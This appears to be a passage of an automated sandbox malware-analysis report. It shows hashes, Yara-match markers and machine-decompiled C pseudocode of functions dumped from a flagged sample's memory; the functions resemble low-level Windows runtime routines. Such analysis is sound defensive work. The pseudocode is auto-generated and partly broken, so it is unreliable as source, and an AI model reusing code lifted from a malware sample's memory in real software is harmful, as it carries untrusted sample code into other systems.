                            0x00adc22c
                            0x00adc234
                            0x00adc23a
                            0x00adc23f
                            0x00adc245
                            0x00adc24b
                            0x00adc251
                            0x00adc25a
                            0x00adc276
                            0x00adc27d
                            0x00adc27d
                            0x00adc25c
                            0x00adc25c
                            0x00000000
                            0x00adc25e
                            0x00adc1a4
                            0x00adc1aa
                            0x00adc1b3
                            0x00adc265
                            0x00adc26c
                            0x00adc26c
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction ID: f231966be3ef32b2acd51bd5f5d00461a5bdf599b8a9c25b7fc42f5e47871e2d
                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction Fuzzy Hash: C0310371A01556BED704EBB4C581BE9F7A5BF42310F54416FE41D87302DB346A46DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E522, Relevance: .1, Instructions: 99COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 833f349fd228e396a892adad2486016ff9b1a9120d873ae206b1eba0cb10d177
                            • Instruction ID: 27c521e53482699c27725c34f5406f8f87d71ec4bd25c89965fd459e46673c3d
                            • Opcode Fuzzy Hash: 833f349fd228e396a892adad2486016ff9b1a9120d873ae206b1eba0cb10d177
                            • Instruction Fuzzy Hash: C241457680C7C2DFEB11DF78D89A6563F72E356334708078AC8A2471D2D374256ACB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041EF49, Relevance: .1, Instructions: 99COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01a2476ecfb3fa808131e3f690dd72cbbe531b308c1e966c3f616585ac71a6c6
                            • Instruction ID: 1bb310162d2b82416f56a9a6e01f807412eb4e226b8f5ab41b177c39740aeeee
                            • Opcode Fuzzy Hash: 01a2476ecfb3fa808131e3f690dd72cbbe531b308c1e966c3f616585ac71a6c6
                            • Instruction Fuzzy Hash: 224143326087928BD319DF39D946A413FF4F31A324B54428ED961674EAC3792259CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ABAA16, Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00ABAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0xbad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0xba7b9c; // 0x0
					_t53 = L00AD4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L00AFB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00AFF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00AC6C59(_t53, _t51, _t58) != 0) {
							_t28 = L00AE5E50(0xa9c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00AEB230(_v32, _v28, 0xa9c2d8, 1,  &_v24);
								_t28 = L00ABF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                            0x00abaa25
                            0x00abaa29
                            0x00abaa2d
                            0x00abaa30
                            0x00abaa37
                            0x00abaa3c
                            0x00b14458
                            0x00b14458
                            0x00b14472
                            0x00b14474
                            0x00b14476
                            0x00abaa64
                            0x00abaa74
                            0x00b1447c
                            0x00b14483
                            0x00b14492
                            0x00abaa52
                            0x00abaa54
                            0x00abaa5e
                            0x00b144a8
                            0x00b144ad
                            0x00b144af
                            0x00b144b6
                            0x00b144b6
                            0x00b144b9
                            0x00b144bc
                            0x00b144cd
                            0x00b144d3
                            0x00b144d6
                            0x00b144e1
                            0x00b144e1
                            0x00b144e6
                            0x00b144e8
                            0x00b144fb
                            0x00b144fb
                            0x00b144e8
                            0x00000000
                            0x00abaa5e
                            0x00b14476
                            0x00abaa42
                            0x00abaa46
                            0x00abaa48
                            0x00abaa4c
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b566d9d278d2ef62a1d599486749da89ed648f6506bf78aeb1464eca166ad7b
                            • Instruction ID: f7e5dab5f2f873250e83d444c5a50aa30cc5b986b030fdc4ca096f92aa244469
                            • Opcode Fuzzy Hash: 1b566d9d278d2ef62a1d599486749da89ed648f6506bf78aeb1464eca166ad7b
                            • Instruction Fuzzy Hash: B431C571A00619ABCF109F64CE82ABFB7B9FF04700B41446AF905EB251EB749D51D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE61A0, Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E00AE61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L00AE5E50(0xa967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							L00B89D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L00ABF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                            0x00ae61b3
                            0x00ae61b5
                            0x00ae61bd
                            0x00ae61c3
                            0x00ae61c7
                            0x00ae61d2
                            0x00ae61ff
                            0x00ae61ff
                            0x00ae6201
                            0x00ae6207
                            0x00ae6207
                            0x00ae61d4
                            0x00ae61d9
                            0x00000000
                            0x00000000
                            0x00ae61df
                            0x00ae61e2
                            0x00000000
                            0x00000000
                            0x00ae61e6
                            0x00ae61e8
                            0x00ae61ee
                            0x00ae61ee
                            0x00ae61f9
                            0x00b2762f
                            0x00b27632
                            0x00b27635
                            0x00b27639
                            0x00b27640
                            0x00b2766e
                            0x00b27675
                            0x00000000
                            0x00000000
                            0x00b27681
                            0x00b27689
                            0x00b2768d
                            0x00b27691
                            0x00b27695
                            0x00b27699
                            0x00b276af
                            0x00b276b5
                            0x00b276b7
                            0x00b276b7
                            0x00b276d7
                            0x00b276dc
                            0x00000000
                            0x00b276dc
                            0x00b276a2
                            0x00b276a9
                            0x00b27651
                            0x00b27653
                            0x00b27653
                            0x00b27656
                            0x00b27656
                            0x00000000
                            0x00b27656
                            0x00b27644
                            0x00b27646
                            0x00b27648
                            0x00b27648
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b86ed17b1bedb2762d10838973aac77baff45885487e9856aacf273e48b87640
                            • Instruction ID: 3625dd697d2b626d561266a19216efc3cc89f73c939534a16a7ad8ad8a79a26d
                            • Opcode Fuzzy Hash: b86ed17b1bedb2762d10838973aac77baff45885487e9856aacf273e48b87640
                            • Instruction Fuzzy Hash: AD319A716097518FD361CF1AC940B26B7E4FF98B00F1449ADE9989B351EBB0EC04CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF4A2C, Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E00AF4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xbad360 ^ _t62;
				_v8 =  *0xbad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00AD2280(_t26, 0xba8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L00ACFFB0(_t41, _t51, 0xba8608);
						L2:
						 *0xbab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L00AFB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00AD2280(_t28, 0xba8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L00ACFFB0(_t42, _t53, 0xba8608);
							if(_t53 != 0) {
								L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L00ACFFB0(_t41, _t51, 0xba8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                            0x00af4a2c
                            0x00af4a34
                            0x00af4a3c
                            0x00af4a3e
                            0x00af4a48
                            0x00af4a4b
                            0x00af4a4d
                            0x00af4a51
                            0x00af4a9c
                            0x00000000
                            0x00000000
                            0x00af4aa3
                            0x00af4aa8
                            0x00af4aad
                            0x00af4ab1
                            0x00af4ade
                            0x00af4ae3
                            0x00af4a5a
                            0x00af4a62
                            0x00af4a6a
                            0x00af4a6e
                            0x00b2f203
                            0x00af4a84
                            0x00af4a88
                            0x00af4a89
                            0x00af4a8a
                            0x00af4a95
                            0x00af4a95
                            0x00af4a79
                            0x00af4a80
                            0x00af4af2
                            0x00af4af4
                            0x00af4af9
                            0x00af4aff
                            0x00af4b01
                            0x00af4b03
                            0x00af4b08
                            0x00b2f20a
                            0x00b2f212
                            0x00b2f216
                            0x00b2f216
                            0x00af4b08
                            0x00af4b13
                            0x00af4b1a
                            0x00b2f229
                            0x00b2f229
                            0x00af4b1a
                            0x00af4a82
                            0x00000000
                            0x00af4a82
                            0x00af4ab7
                            0x00af4acd
                            0x00af4acd
                            0x00af4ad5
                            0x00af4ada
                            0x00000000
                            0x00af4ada
                            0x00af4ac2
                            0x00af4acb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00af4acb
                            0x00af4a53
                            0x00af4a53
                            0x00af4a58
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 922817324f8659d151df59049723f4383600a70d4bd173282a762045ed94be2c
                            • Instruction ID: 9276e28cda9ef1029e8c16a59175f076d1e9b9d6cef9dfc0798f3976dec2f114
                            • Opcode Fuzzy Hash: 922817324f8659d151df59049723f4383600a70d4bd173282a762045ed94be2c
                            • Instruction Fuzzy Hash: 5F31EF322456149BC721AF98CA41B3BBBF5FF8A750F154469FA5647A51CB70DC00CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB9100, Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E00AB9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xb8f6e8);
				E00B0D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00B888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00B0D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0xba86c0; // 0x6507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0xba86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00AD2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00B888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L00AFAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0xbab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0xba84c0;
										if(_t69 >=  *0xba84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00B89063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00AB922A(_t82);
							_t53 = L00AD7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = L00B88B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0xba86c0; // 0x6507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0xba86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0xba86bc;
										_t72 = 0xba86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00AB9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0xba86c4;
									_t72 = 0xba86c0;
									L18:
									E00AE9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                            0x00ab9100
                            0x00ab9100
                            0x00ab9100
                            0x00ab9100
                            0x00ab9102
                            0x00ab9107
                            0x00ab910c
                            0x00ab9110
                            0x00ab9115
                            0x00ab9136
                            0x00ab9143
                            0x00b137e4
                            0x00b137e4
                            0x00ab9149
                            0x00ab914e
                            0x00ab914e
                            0x00ab9117
                            0x00ab911d
                            0x00000000
                            0x00000000
                            0x00ab911f
                            0x00ab9125
                            0x00000000
                            0x00ab9151
                            0x00ab9158
                            0x00ab915d
                            0x00ab9161
                            0x00ab9168
                            0x00b13715
                            0x00000000
                            0x00ab916e
                            0x00ab916e
                            0x00ab9175
                            0x00ab9177
                            0x00ab917e
                            0x00ab917f
                            0x00ab9182
                            0x00ab9182
                            0x00ab9187
                            0x00ab9187
                            0x00ab918a
                            0x00ab918d
                            0x00ab918f
                            0x00ab9192
                            0x00ab9195
                            0x00ab9198
                            0x00ab9198
                            0x00ab9198
                            0x00ab919a
                            0x00000000
                            0x00000000
                            0x00b1371f
                            0x00b13721
                            0x00b13727
                            0x00b1372f
                            0x00b13733
                            0x00b13735
                            0x00b13738
                            0x00b1373b
                            0x00b1373d
                            0x00b13740
                            0x00000000
                            0x00000000
                            0x00b13746
                            0x00b13749
                            0x00000000
                            0x00000000
                            0x00b1374f
                            0x00b13751
                            0x00000000
                            0x00000000
                            0x00b13757
                            0x00b13759
                            0x00b1375c
                            0x00b1375c
                            0x00b1375e
                            0x00b1375e
                            0x00b13761
                            0x00b13764
                            0x00000000
                            0x00000000
                            0x00b13766
                            0x00b13768
                            0x00b137a3
                            0x00b137a3
                            0x00b137a5
                            0x00b137a7
                            0x00b137ad
                            0x00b137b0
                            0x00b137b2
                            0x00b137bc
                            0x00b137c2
                            0x00b137c2
                            0x00b137b2
                            0x00ab9187
                            0x00ab9187
                            0x00ab918a
                            0x00ab918d
                            0x00ab918f
                            0x00ab9192
                            0x00ab9195
                            0x00000000
                            0x00ab9195
                            0x00000000
                            0x00ab9187
                            0x00b1376a
                            0x00b1376a
                            0x00b1376c
                            0x00b1376c
                            0x00b1376f
                            0x00b13775
                            0x00000000
                            0x00000000
                            0x00b13777
                            0x00b13779
                            0x00000000
                            0x00000000
                            0x00b13782
                            0x00b13787
                            0x00b13789
                            0x00b13790
                            0x00b13790
                            0x00b1378b
                            0x00b1378b
                            0x00b1378b
                            0x00b13792
                            0x00b13795
                            0x00b13795
                            0x00b13798
                            0x00b13798
                            0x00b1379b
                            0x00b1379b
                            0x00ab91a3
                            0x00ab91a9
                            0x00ab91b0
                            0x00ab91b4
                            0x00ab91b4
                            0x00ab91bb
                            0x00ab91c0
                            0x00ab91c5
                            0x00ab91c7
                            0x00b137da
                            0x00ab91cd
                            0x00ab91cd
                            0x00ab91cd
                            0x00ab91d2
                            0x00ab91d5
                            0x00ab9239
                            0x00ab9239
                            0x00ab91d7
                            0x00ab91db
                            0x00ab91e1
                            0x00ab91e7
                            0x00ab91fd
                            0x00ab9203
                            0x00ab921e
                            0x00ab9223
                            0x00000000
                            0x00ab9223
                            0x00ab9205
                            0x00ab9208
                            0x00ab920c
                            0x00ab9214
                            0x00ab9214
                            0x00ab91e9
                            0x00ab91e9
                            0x00ab91ee
                            0x00ab91f3
                            0x00ab91f3
                            0x00ab91f3
                            0x00ab91e7
                            0x00000000
                            0x00ab91db
                            0x00ab9187
                            0x00ab9168

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 975c278f3678678bbfcd474a1f74a57d969a177b384d178cf57f22bb912debcd
                            • Instruction ID: 0a38d660c28a72b878edac8c63a5d8ea580c9003a88e62e6295927ba75321b37
                            • Opcode Fuzzy Hash: 975c278f3678678bbfcd474a1f74a57d969a177b384d178cf57f22bb912debcd
                            • Instruction Fuzzy Hash: 6831F671A04246DFDB61DF6CD488BDEBBF5BB49310F288299D50467292D730AD80DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD0050, Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            C-Code - Quality: 53%
                            			E00AD0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xbad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L00AE9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L00AFB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00B88A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L00AE9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xbab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                            0x00ad0055
                            0x00ad005d
                            0x00ad0062
                            0x00ad006c
                            0x00ad006f
                            0x00ad0074
                            0x00ad007a
                            0x00ad007a
                            0x00ad0080
                            0x00ad0080
                            0x00ad0087
                            0x00ad008d
                            0x00ad008f
                            0x00ad0093
                            0x00ad0095
                            0x00ad009b
                            0x00ad00f8
                            0x00ad00fb
                            0x00ad00fc
                            0x00ad00ff
                            0x00ad0108
                            0x00ad0108
                            0x00ad00a2
                            0x00ad00a6
                            0x00ad00b3
                            0x00ad00bc
                            0x00ad00c5
                            0x00ad00ca
                            0x00b1c01e
                            0x00000000
                            0x00000000
                            0x00b1c02d
                            0x00ad00d5
                            0x00ad00d9
                            0x00b1c03d
                            0x00b1c046
                            0x00b1c046
                            0x00ad00df
                            0x00ad00e2
                            0x00ad00ea
                            0x00ad00ef
                            0x00ad00f2
                            0x00ad00f6
                            0x00ad0111
                            0x00ad0117
                            0x00ad0117
                            0x00000000
                            0x00ad00f6
                            0x00ad00d0
                            0x00ad00d0
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 735aec1109ab971f0550abdfff26dc03294b7c484f9f93dec1bc04e77b3f3c90
                            • Instruction ID: 03017a2114c9ef62b64231e8d1d96e7b79a0e638ca288467d77d75f03fc49fb0
                            • Opcode Fuzzy Hash: 735aec1109ab971f0550abdfff26dc03294b7c484f9f93dec1bc04e77b3f3c90
